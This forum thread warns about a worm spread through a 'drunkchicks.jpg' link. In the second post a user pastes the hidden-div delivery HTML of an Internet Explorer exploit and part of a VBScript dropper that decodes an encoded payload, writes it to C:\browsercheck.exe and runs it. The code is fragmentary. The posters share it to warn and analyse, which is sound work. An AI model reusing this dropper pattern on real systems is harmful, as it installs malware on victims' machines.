No announcement yet.

New worm/virus drunkchicks.jpg

  • Filter
  • Time
  • Show
Clear All
new posts

  • New worm/virus drunkchicks.jpg

    [16:25] -O- (Broadcast) WARNING: There is a new worm spreading around. If you see a message with a URL that looks like: '<censored>=drunkchicks.jpg LOL' do NOT visit that link. If you have visited it already you have gotten infected, and you are advised to remove c:\browsercheck.exe

    here's is the image for you that only uses msiexplore's_desktop.jpg
    My cars

  • #2
    This is the newest IE exploit going around. There's a version of it going around on AIM where you will get a IM from an buddy that has the virus telling you to visit a website.

    Simple FIX: DON'T RUN IE. Its sucks and its full of un-patched holes that can lead to problems like this. Some are more then 2 years old. Use mozilla.

    Here's the exploit

    <div style="visibility:hidden;position:absolute;top:30px;left:20px;z-index:2">
    <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
    <xml id="oExec">
                <object id="oFile" data="drunkchicks.php"></object>
    that passes you to a drunkchicks.php which opens up the exploit

    Here is a section of it

    function res(x,y)
    	For k = 0 To UBound(v)
    		v(k) = Replace(v(k), x, y)
    End Function
    res "z", "ff"
    res "y", "00"
    For m = 0 To UBound(v)
    	it = it & v(m)
    tmp = Split(it, ",")
    Set WshShell = CreateObject("WScript.Shell")
    Set WshEnv = WshShell.Environment("Process")
    pth = WshEnv("HOMEDRIVE") & WshEnv("HOMEPATH") & "\browsercheck.exe"
    pth = "C:\browsercheck.exe"
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set f = fso.CreateTextFile(pth, True)
    For i = 0 To UBound(tmp)
    	l = Len(tmp(i))
    	b = Int("&H" & Left(tmp(i), 2))
    	If l > 2 Then
    		r = Int("&H" & Mid(tmp(i), 3, l-2))
    		For j = 1 To r
    		f.Write Chr(b)
    		f.Write Chr(b)
    	End If
    f.Close"""" & pth & """")
    the payload is encoded. I don't know VB all that well but it looks like simple ascii encoding. If i get bored I'll see if i can decode it
    '98 Explorer Sport (down atm)
    AMD 800mhz 192megs RAM 60gig hard drive 9 inch widescreen VGA
    80% done


    • #3
      Or you could actually keep IE (and windows for that matter) patched. But Mozilla is good too If only the tabbrowser pluggin worked 100%, I'd have fully switched, as it is, I still run both.

      Since when is insanity a bad thing?